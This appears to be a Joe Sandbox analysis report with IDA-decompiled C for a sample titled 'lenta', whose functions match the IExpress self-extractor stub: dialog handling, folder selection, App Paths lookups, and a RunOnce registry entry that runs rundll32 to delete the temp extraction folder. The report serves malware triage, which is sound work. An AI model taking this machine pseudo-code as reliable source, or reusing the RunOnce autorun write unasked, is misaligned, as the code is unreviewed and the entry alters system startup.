                              					if(_a12 != 0x1b) {
                              						goto L22;
                              					}
                              					goto L19;
                              				}
                              				_t13 = _t12 - 0xe;
                              				if(_t13 == 0) {
                              					_t35 = _a4;
                              					 *0xa78584 = _t35;
                              					E00A743D0(_t35, GetDesktopWindow());
                              					__eflags =  *0xa78184; // 0x1
                              					if(__eflags != 0) {
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                              					}
                              					SetWindowTextA(_t35, "lenta");
                              					_t17 = CreateThread(0, 0, E00A74FE0, 0, 0, 0xa78798);
                              					 *0xa7879c = _t17;
                              					__eflags = _t17;
                              					if(_t17 != 0) {
                              						goto L22;
                              					} else {
                              						E00A744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                              						_push(0);
                              						_push(_t35);
                              						goto L21;
                              					}
                              				}
                              				_t23 = _t13 - 1;
                              				if(_t23 == 0) {
                              					__eflags = _a12 - 2;
                              					if(_a12 != 2) {
                              						goto L22;
                              					}
                              					ResetEvent( *0xa7858c);
                              					_t38 =  *0xa78584; // 0x0
                              					_t25 = E00A744B9(_t38, 0x4b2, 0xa71140, 0, 0x20, 4);
                              					__eflags = _t25 - 6;
                              					if(_t25 == 6) {
                              						L11:
                              						 *0xa791d8 = 1;
                              						SetEvent( *0xa7858c);
                              						_t39 =  *0xa7879c; // 0x0
                              						E00A73680(_t39);
                              						_push(0);
                              						goto L20;
                              					}
                              					__eflags = _t25 - 1;
                              					if(_t25 == 1) {
                              						goto L11;
                              					}
                              					SetEvent( *0xa7858c);
                              					goto L22;
                              				}
                              				if(_t23 == 0xe90) {
                              					TerminateThread( *0xa7879c, 0);
                              					EndDialog(_a4, _a12);
                              					return 1;
                              				}
                              				return 0;
                              			}












                              0x00a734fb
                              0x00a734fe
                              0x00a73665
                              0x00a73666
                              0x00a73666
                              0x00a73668
                              0x00a7366e
                              0x00a7366e
                              0x00a73671
                              0x00a73671
                              0x00a73677
                              0x00000000
                              0x00a73677
                              0x00a73504
                              0x00a73506
                              0x00a73507
                              0x00a7350c
                              0x00a7365b
                              0x00a7365f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73661
                              0x00a73512
                              0x00a73515
                              0x00a735be
                              0x00a735c1
                              0x00a735d1
                              0x00a735d8
                              0x00a735de
                              0x00a735f8
                              0x00a73617
                              0x00a73617
                              0x00a73623
                              0x00a73637
                              0x00a7363d
                              0x00a73642
                              0x00a73644
                              0x00000000
                              0x00a73646
                              0x00a73652
                              0x00a73657
                              0x00a73658
                              0x00000000
                              0x00a73658
                              0x00a73644
                              0x00a7351b
                              0x00a7351d
                              0x00a7354f
                              0x00a73553
                              0x00000000
                              0x00000000
                              0x00a7355f
                              0x00a73565
                              0x00a7357c
                              0x00a73581
                              0x00a73584
                              0x00a7359b
                              0x00a735a1
                              0x00a735a7
                              0x00a735ad
                              0x00a735b3
                              0x00a735b8
                              0x00000000
                              0x00a735b8
                              0x00a73586
                              0x00a73588
                              0x00000000
                              0x00000000
                              0x00a73590
                              0x00000000
                              0x00a73590
                              0x00a73524
                              0x00a73535
                              0x00a73541
                              0x00000000
                              0x00a73549
                              0x00000000

                              APIs
                              • TerminateThread.KERNEL32(00000000), ref: 00A73535
                              • EndDialog.USER32(?,?), ref: 00A73541
                              • ResetEvent.KERNEL32 ref: 00A7355F
                              • SetEvent.KERNEL32(00A71140,00000000,00000020,00000004), ref: 00A73590
                              • GetDesktopWindow.USER32 ref: 00A735C7
                              • GetDlgItem.USER32(?,0000083B), ref: 00A735F1
                              • SendMessageA.USER32(00000000), ref: 00A735F8
                              • GetDlgItem.USER32(?,0000083B), ref: 00A73610
                              • SendMessageA.USER32(00000000), ref: 00A73617
                              • SetWindowTextA.USER32(?,lenta), ref: 00A73623
                              • CreateThread.KERNEL32 ref: 00A73637
                              • EndDialog.USER32(?,00000000), ref: 00A73671
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                              • String ID: lenta
                              • API String ID: 2406144884-2780258678
                              • Opcode ID: cb6e576f68fac53e8cf16705a433f72a880496b6ac94de7df9cef50602065629
                              • Instruction ID: 1882860fff6773b9905055aad0fc30419757912ecf0185f58d7cc79e1f223b0b
                              • Opcode Fuzzy Hash: cb6e576f68fac53e8cf16705a433f72a880496b6ac94de7df9cef50602065629
                              • Instruction Fuzzy Hash: 7F31E432340300BBDB209FA5EC0DE2B3B65E7D5B11F51C629F60E952B1CB758982EA55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E00A74224(char __ecx) {
                              				char* _v8;
                              				_Unknown_base(*)()* _v12;
                              				_Unknown_base(*)()* _v16;
                              				_Unknown_base(*)()* _v20;
                              				char* _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				char _v48;
                              				char _v52;
                              				_Unknown_base(*)()* _t26;
                              				_Unknown_base(*)()* _t28;
                              				_Unknown_base(*)()* _t29;
                              				_Unknown_base(*)()* _t32;
                              				char _t42;
                              				char* _t44;
                              				char* _t61;
                              				void* _t63;
                              				char* _t65;
                              				struct HINSTANCE__* _t66;
                              				char _t67;
                              				void* _t71;
                              				char _t76;
                              				intOrPtr _t85;
                              
                              				_t67 = __ecx;
                              				_t66 = LoadLibraryA("SHELL32.DLL");
                              				if(_t66 == 0) {
                              					_t63 = 0x4c2;
                              					L22:
                              					E00A744B9(_t67, _t63, 0, 0, 0x10, 0);
                              					return 0;
                              				}
                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                              				_v12 = _t26;
                              				if(_t26 == 0) {
                              					L20:
                              					FreeLibrary(_t66);
                              					_t63 = 0x4c1;
                              					goto L22;
                              				}
                              				_t28 = GetProcAddress(_t66, 0xc3);
                              				_v20 = _t28;
                              				if(_t28 == 0) {
                              					goto L20;
                              				}
                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                              				_v16 = _t29;
                              				if(_t29 == 0) {
                              					goto L20;
                              				}
                              				_t76 =  *0xa788c0; // 0x0
                              				if(_t76 != 0) {
                              					L10:
                              					 *0xa787a0 = 0;
                              					_v52 = _t67;
                              					_v48 = 0;
                              					_v44 = 0;
                              					_v40 = 0xa78598;
                              					_v36 = 1;
                              					_v32 = E00A74200;
                              					_v28 = 0xa788c0;
                              					 *0xa7a288( &_v52);
                              					_t32 =  *_v12();
                              					if(_t71 != _t71) {
                              						asm("int 0x29");
                              					}
                              					_v12 = _t32;
                              					if(_t32 != 0) {
                              						 *0xa7a288(_t32, 0xa788c0);
                              						 *_v16();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              						if( *0xa788c0 != 0) {
                              							E00A71680(0xa787a0, 0x104, 0xa788c0);
                              						}
                              						 *0xa7a288(_v12);
                              						 *_v20();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              					}
                              					FreeLibrary(_t66);
                              					_t85 =  *0xa787a0; // 0x0
                              					return 0 | _t85 != 0x00000000;
                              				} else {
                              					GetTempPathA(0x104, 0xa788c0);
                              					_t61 = 0xa788c0;
                              					_t4 =  &(_t61[1]); // 0xa788c1
                              					_t65 = _t4;
                              					do {
                              						_t42 =  *_t61;
                              						_t61 =  &(_t61[1]);
                              					} while (_t42 != 0);
                              					_t5 = _t61 - _t65 + 0xa788c0; // 0x14f1181
                              					_t44 = CharPrevA(0xa788c0, _t5);
                              					_v8 = _t44;
                              					if( *_t44 == 0x5c &&  *(CharPrevA(0xa788c0, _t44)) != 0x3a) {
                              						 *_v8 = 0;
                              					}
                              					goto L10;
                              				}
                              			}




























                              0x00a74234
                              0x00a7423c
                              0x00a74240
                              0x00a743b2
                              0x00a743b7
                              0x00a743c0
                              0x00000000
                              0x00a743c5
                              0x00a7424c
                              0x00a74252
                              0x00a74257
                              0x00a743a4
                              0x00a743a5
                              0x00a743ab
                              0x00000000
                              0x00a743ab
                              0x00a74263
                              0x00a74269
                              0x00a7426e
                              0x00000000
                              0x00000000
                              0x00a7427a
                              0x00a74280
                              0x00a74285
                              0x00000000
                              0x00000000
                              0x00a7428d
                              0x00a74293
                              0x00a742e6
                              0x00a742e9
                              0x00a742ef
                              0x00a742f4
                              0x00a742f7
                              0x00a74300
                              0x00a74307
                              0x00a7430e
                              0x00a74315
                              0x00a7431c
                              0x00a74322
                              0x00a74326
                              0x00a7432d
                              0x00a7432d
                              0x00a7432f
                              0x00a74334
                              0x00a74343
                              0x00a74349
                              0x00a7434d
                              0x00a74354
                              0x00a74354
                              0x00a7435d
                              0x00a7436e
                              0x00a7436e
                              0x00a7437d
                              0x00a74383
                              0x00a74387
                              0x00a7438e
                              0x00a7438e
                              0x00a74387
                              0x00a74391
                              0x00a74399
                              0x00000000
                              0x00a74295
                              0x00a7429f
                              0x00a742a5
                              0x00a742aa
                              0x00a742aa
                              0x00a742ad
                              0x00a742ad
                              0x00a742af
                              0x00a742b0
                              0x00a742b6
                              0x00a742c2
                              0x00a742c8
                              0x00a742ce
                              0x00a742e4
                              0x00a742e4
                              0x00000000
                              0x00a742ce

                              APIs
                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A74236
                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A7424C
                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A74263
                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A7427A
                              • GetTempPathA.KERNEL32(00000104,00A788C0,?,00000001), ref: 00A7429F
                              • CharPrevA.USER32(00A788C0,014F1181,?,00000001), ref: 00A742C2
                              • CharPrevA.USER32(00A788C0,00000000,?,00000001), ref: 00A742D6
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A74391
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A743A5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                              • API String ID: 1865808269-1731843650
                              • Opcode ID: ee398c260b225950a669bb30c9c405315b13a553c3d9ed1a0fc8f11202c65180
                              • Instruction ID: 6a07b75348c921c354c4ed2c34315f904b95d2a50d08cca6941fe31d0f9df446
                              • Opcode Fuzzy Hash: ee398c260b225950a669bb30c9c405315b13a553c3d9ed1a0fc8f11202c65180
                              • Instruction Fuzzy Hash: B6412875A40200BFE7119FB4DC8C9AE7BB4EB48385F44C569E94DA7251CB788C42C762
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                              				signed int _v8;
                              				char _v64;
                              				char _v576;
                              				void* _v580;
                              				struct HWND__* _v584;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t34;
                              				void* _t37;
                              				signed int _t39;
                              				intOrPtr _t43;
                              				signed int _t44;
                              				signed int _t49;
                              				signed int _t52;
                              				void* _t54;
                              				intOrPtr _t55;
                              				intOrPtr _t58;
                              				intOrPtr _t59;
                              				int _t64;
                              				void* _t66;
                              				intOrPtr* _t67;
                              				signed int _t69;
                              				intOrPtr* _t73;
                              				intOrPtr* _t76;
                              				intOrPtr* _t77;
                              				void* _t80;
                              				void* _t81;
                              				void* _t82;
                              				intOrPtr* _t84;
                              				void* _t85;
                              				signed int _t89;
                              
                              				_t75 = __edx;
                              				_t34 =  *0xa78004; // 0x74742267
                              				_v8 = _t34 ^ _t89;
                              				_v584 = __ecx;
                              				_t83 = "LoadString() Error.  Could not load string resource.";
                              				_t67 = _a4;
                              				_t69 = 0xd;
                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                              				_t80 = _t83 + _t69 + _t69;
                              				_v580 = _t37;
                              				asm("movsb");
                              				if(( *0xa78a38 & 0x00000001) != 0) {
                              					_t39 = 1;
                              				} else {
                              					_v576 = 0;
                              					LoadStringA( *0xa79a3c, _t75,  &_v576, 0x200);
                              					if(_v576 != 0) {
                              						_t73 =  &_v576;
                              						_t16 = _t73 + 1; // 0x1
                              						_t75 = _t16;
                              						do {
                              							_t43 =  *_t73;
                              							_t73 = _t73 + 1;
                              						} while (_t43 != 0);
                              						_t84 = _v580;
                              						_t74 = _t73 - _t75;
                              						if(_t84 == 0) {
                              							if(_t67 == 0) {
                              								_t27 = _t74 + 1; // 0x2
                              								_t83 = _t27;
                              								_t44 = LocalAlloc(0x40, _t83);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									_t75 = _t83;
                              									_t74 = _t80;
                              									E00A71680(_t80, _t83,  &_v576);
                              									goto L23;
                              								}
                              							} else {
                              								_t76 = _t67;
                              								_t24 = _t76 + 1; // 0x1
                              								_t85 = _t24;
                              								do {
                              									_t55 =  *_t76;
                              									_t76 = _t76 + 1;
                              								} while (_t55 != 0);
                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                              								_t83 = _t25 + _t74;
                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									E00A7171E(_t80, _t83,  &_v576, _t67);
                              									goto L23;
                              								}
                              							}
                              						} else {
                              							_t77 = _t67;
                              							_t18 = _t77 + 1; // 0x1
                              							_t81 = _t18;
                              							do {
                              								_t58 =  *_t77;
                              								_t77 = _t77 + 1;
                              							} while (_t58 != 0);
                              							_t75 = _t77 - _t81;
                              							_t82 = _t84 + 1;
                              							do {
                              								_t59 =  *_t84;
                              								_t84 = _t84 + 1;
                              							} while (_t59 != 0);
                              							_t21 = _t74 + 0x64; // 0x65
                              							_t83 = _t21 + _t84 - _t82 + _t75;
                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                              							_t80 = _t44;
                              							if(_t80 == 0) {
                              								goto L6;
                              							} else {
                              								_push(_v580);
                              								E00A7171E(_t80, _t83,  &_v576, _t67);
                              								L23:
                              								MessageBeep(_a12);
                              								if(E00A7681F(_t67) == 0) {
                              									L25:
                              									_t49 = 0x10000;
                              								} else {
                              									_t54 = E00A767C9(_t74, _t74);
                              									_t49 = 0x190000;
                              									if(_t54 == 0) {
                              										goto L25;
                              									}
                              								}
                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                              								_t83 = _t52;
                              								LocalFree(_t80);
                              								_t39 = _t52;
                              							}
                              						}
                              					} else {
                              						if(E00A7681F(_t67) == 0) {
                              							L4:
                              							_t64 = 0x10010;
                              						} else {
                              							_t66 = E00A767C9(0, 0);
                              							_t64 = 0x190010;
                              							if(_t66 == 0) {
                              								goto L4;
                              							}
                              						}
                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                              						L6:
                              						_t39 = _t44 | 0xffffffff;
                              					}
                              				}
                              				return E00A76CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                              			}



































                              0x00a744b9
                              0x00a744c4
                              0x00a744cb
                              0x00a744d8
                              0x00a744e4
                              0x00a744eb
                              0x00a744ee
                              0x00a744ef
                              0x00a744ef
                              0x00a744f1
                              0x00a744f7
                              0x00a744f8
                              0x00a7467b
                              0x00a744fe
                              0x00a74509
                              0x00a74518
                              0x00a74525
                              0x00a74562
                              0x00a74568
                              0x00a74568
                              0x00a7456b
                              0x00a7456b
                              0x00a7456d
                              0x00a7456e
                              0x00a74572
                              0x00a74578
                              0x00a7457c
                              0x00a745cb
                              0x00a74607
                              0x00a74607
                              0x00a7460d
                              0x00a74613
                              0x00a74617
                              0x00000000
                              0x00a7461d
                              0x00a74623
                              0x00a74626
                              0x00a74628
                              0x00000000
                              0x00a74628
                              0x00a745cd
                              0x00a745cd
                              0x00a745cf
                              0x00a745cf
                              0x00a745d2
                              0x00a745d2
                              0x00a745d4
                              0x00a745d5
                              0x00a745db
                              0x00a745de
                              0x00a745e3
                              0x00a745e9
                              0x00a745ed
                              0x00000000
                              0x00a745f3
                              0x00a745fd
                              0x00000000
                              0x00a74602
                              0x00a745ed
                              0x00a7457e
                              0x00a7457e
                              0x00a74580
                              0x00a74580
                              0x00a74583
                              0x00a74583
                              0x00a74585
                              0x00a74586
                              0x00a7458a
                              0x00a7458c
                              0x00a7458f
                              0x00a7458f
                              0x00a74591
                              0x00a74592
                              0x00a7459b
                              0x00a7459e
                              0x00a745a3
                              0x00a745a9
                              0x00a745ad
                              0x00000000
                              0x00a745af
                              0x00a745af
                              0x00a745bf
                              0x00a7462d
                              0x00a74630
                              0x00a7463d
                              0x00a7464e
                              0x00a7464e
                              0x00a7463f
                              0x00a74640
                              0x00a74647
                              0x00a7464c
                              0x00000000
                              0x00000000
                              0x00a7464c
                              0x00a74666
                              0x00a7466d
                              0x00a7466f
                              0x00a74675
                              0x00a74675
                              0x00a745ad
                              0x00a74527
                              0x00a7452e
                              0x00a7453f
                              0x00a7453f
                              0x00a74530
                              0x00a74531
                              0x00a74538
                              0x00a7453d
                              0x00000000
                              0x00000000
                              0x00a7453d
                              0x00a74554
                              0x00a7455a
                              0x00a7455a
                              0x00a7455a
                              0x00a74525
                              0x00a7468c

                              APIs
                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A745A3
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A745E3
                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A7460D
                              • MessageBeep.USER32(00000000), ref: 00A74630
                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A74666
                              • LocalFree.KERNEL32(00000000), ref: 00A7466F
                                • Part of subcall function 00A7681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A7686E
                                • Part of subcall function 00A7681F: GetSystemMetrics.USER32(0000004A), ref: 00A768A7
                                • Part of subcall function 00A7681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A768CC
                                • Part of subcall function 00A7681F: RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,?,0000000C), ref: 00A768F4
                                • Part of subcall function 00A7681F: RegCloseKey.ADVAPI32(?), ref: 00A76902
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                              • String ID: LoadString() Error. Could not load string resource.$lenta
                              • API String ID: 3244514340-1000497449
                              • Opcode ID: f13acb1defd41eb0ae58a766bc48be12fe380aedd95f97afc1ec736ede777590
                              • Instruction ID: 549a80cbfe31d7559c61bf7a5ab37d2d2e539fb2296dbc2fa44f60b633608be0
                              • Opcode Fuzzy Hash: f13acb1defd41eb0ae58a766bc48be12fe380aedd95f97afc1ec736ede777590
                              • Instruction Fuzzy Hash: 5851D672900115ABDB21DF68CC48BAABBB9EF89300F14C1A5FD1DA7241DB31DD46CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A72773(CHAR* __ecx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				char _v269;
                              				CHAR* _v276;
                              				int _v280;
                              				void* _v284;
                              				int _v288;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t23;
                              				intOrPtr _t34;
                              				int _t45;
                              				int* _t50;
                              				CHAR* _t52;
                              				CHAR* _t61;
                              				char* _t62;
                              				int _t63;
                              				CHAR* _t64;
                              				signed int _t65;
                              
                              				_t52 = __ecx;
                              				_t23 =  *0xa78004; // 0x74742267
                              				_v8 = _t23 ^ _t65;
                              				_t62 = _a4;
                              				_t50 = 0;
                              				_t61 = __ecx;
                              				_v276 = _t62;
                              				 *((char*)(__ecx)) = 0;
                              				if( *_t62 != 0x23) {
                              					_t63 = 0x104;
                              					goto L14;
                              				} else {
                              					_t64 = _t62 + 1;
                              					_v269 = CharUpperA( *_t64);
                              					_v276 = CharNextA(CharNextA(_t64));
                              					_t63 = 0x104;
                              					_t34 = _v269;
                              					if(_t34 == 0x53) {
                              						L14:
                              						GetSystemDirectoryA(_t61, _t63);
                              						goto L15;
                              					} else {
                              						if(_t34 == 0x57) {
                              							GetWindowsDirectoryA(_t61, 0x104);
                              							goto L16;
                              						} else {
                              							_push(_t52);
                              							_v288 = 0x104;
                              							E00A71781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                              							_t59 = 0x104;
                              							E00A7658A( &_v268, 0x104, _v276);
                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                              								L16:
                              								_t59 = _t63;
                              								E00A7658A(_t61, _t63, _v276);
                              							} else {
                              								if(RegQueryValueExA(_v284, 0xa71140, 0,  &_v280, _t61,  &_v288) == 0) {
                              									_t45 = _v280;
                              									if(_t45 != 2) {
                              										L9:
                              										if(_t45 == 1) {
                              											goto L10;
                              										}
                              									} else {
                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                              											_t45 = _v280;
                              											goto L9;
                              										} else {
                              											_t59 = 0x104;
                              											E00A71680(_t61, 0x104,  &_v268);
                              											L10:
                              											_t50 = 1;
                              										}
                              									}
                              								}
                              								RegCloseKey(_v284);
                              								L15:
                              								if(_t50 == 0) {
                              									goto L16;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E00A76CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                              			}























                              0x00a72773
                              0x00a7277e
                              0x00a72785
                              0x00a7278a
                              0x00a7278d
                              0x00a72790
                              0x00a72792
                              0x00a72798
                              0x00a7279d
                              0x00a728b2
                              0x00000000
                              0x00a727a3
                              0x00a727a3
                              0x00a727af
                              0x00a727c2
                              0x00a727c8
                              0x00a727cd
                              0x00a727d5
                              0x00a728b7
                              0x00a728b9
                              0x00000000
                              0x00a727db
                              0x00a727dd
                              0x00a728aa
                              0x00000000
                              0x00a727e3
                              0x00a727e3
                              0x00a727ec
                              0x00a727f8
                              0x00a72803
                              0x00a7280b
                              0x00a72831
                              0x00a728c3
                              0x00a728c9
                              0x00a728cd
                              0x00a72837
                              0x00a7285a
                              0x00a7285c
                              0x00a72865
                              0x00a72892
                              0x00a72895
                              0x00000000
                              0x00000000
                              0x00a72867
                              0x00a72878
                              0x00a7288c
                              0x00000000
                              0x00a7287a
                              0x00a72880
                              0x00a72885
                              0x00a72897
                              0x00a72899
                              0x00a72899
                              0x00a72878
                              0x00a72865
                              0x00a728a0
                              0x00a728bf
                              0x00a728c1
                              0x00000000
                              0x00000000
                              0x00a728c1
                              0x00a72831
                              0x00a727dd
                              0x00a727d5
                              0x00a728e5

                              APIs
                              • CharUpperA.USER32(74742267,00000000,00000000,00000000), ref: 00A727A8
                              • CharNextA.USER32(0000054D), ref: 00A727B5
                              • CharNextA.USER32(00000000), ref: 00A727BC
                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72829
                              • RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72852
                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72870
                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A728A0
                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A728AA
                              • GetSystemDirectoryA.KERNEL32 ref: 00A728B9
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A727E4
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                              • API String ID: 2659952014-2428544900
                              • Opcode ID: 1930bd849d01fbba169683b1bff5900a9acb256dc6dd738b76cb99d3054fb284
                              • Instruction ID: a76d88b6f3eace77170561661d880eb3c9e852400c7c728ed7c3e20681c6743f
                              • Opcode Fuzzy Hash: 1930bd849d01fbba169683b1bff5900a9acb256dc6dd738b76cb99d3054fb284
                              • Instruction Fuzzy Hash: 2C41A271A00128AFDB249B64DC85BEE77BDEB65701F00C4A9F58DD2100DB708EC69FA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E00A72267() {
                              				signed int _v8;
                              				char _v268;
                              				char _v836;
                              				void* _v840;
                              				int _v844;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				intOrPtr _t33;
                              				void* _t38;
                              				intOrPtr* _t42;
                              				void* _t45;
                              				void* _t47;
                              				void* _t49;
                              				signed int _t51;
                              
                              				_t19 =  *0xa78004; // 0x74742267
                              				_t20 = _t19 ^ _t51;
                              				_v8 = _t19 ^ _t51;
                              				if( *0xa78530 != 0) {
                              					_push(_t49);
                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                              						_push(_t38);
                              						_v844 = 0x238;
                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                              							_push(_t47);
                              							memset( &_v268, 0, 0x104);
                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              								E00A7658A( &_v268, 0x104, 0xa71140);
                              							}
                              							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              							E00A7171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                              							_t42 =  &_v836;
                              							_t45 = _t42 + 1;
                              							_pop(_t47);
                              							do {
                              								_t33 =  *_t42;
                              								_t42 = _t42 + 1;
                              							} while (_t33 != 0);
                              							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                              						}
                              						_t20 = RegCloseKey(_v840);
                              						_pop(_t38);
                              					}
                              					_pop(_t49);
                              				}
                              				return E00A76CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                              			}



















                              0x00a72272
                              0x00a72277
                              0x00a72279
                              0x00a72283
                              0x00a72289
                              0x00a722ab
                              0x00a722b1
                              0x00a722c4
                              0x00a722e0
                              0x00a722e6
                              0x00a722f5
                              0x00a7230d
                              0x00a7231c
                              0x00a7231c
                              0x00a72321
                              0x00a7233a
                              0x00a72342
                              0x00a72348
                              0x00a7234b
                              0x00a7234c
                              0x00a7234c
                              0x00a7234e
                              0x00a7234f
                              0x00a7236e
                              0x00a7236e
                              0x00a7237a
                              0x00a72380
                              0x00a72380
                              0x00a72381
                              0x00a72381
                              0x00a7238f

                              APIs
